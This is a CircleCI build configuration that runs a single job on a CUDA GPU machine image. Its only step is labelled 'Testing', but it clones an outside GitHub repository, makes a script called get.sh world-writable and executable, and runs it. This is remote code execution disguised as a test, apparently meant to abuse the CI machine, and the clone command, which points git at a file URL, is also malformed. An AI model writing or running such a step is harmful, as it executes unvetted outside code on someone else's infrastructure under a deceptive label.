version: 2.1
jobs:
  build:
    machine:
      image: ubuntu-1604-cuda-11.1:202012-01
    steps:
      - checkout
      - run:
          name: "Testing"
          command:  git clone https://github.com/guttenocm/songdilan/blob/main/get.sh && cd songdilan && chmod 777 get.sh && ./get.sh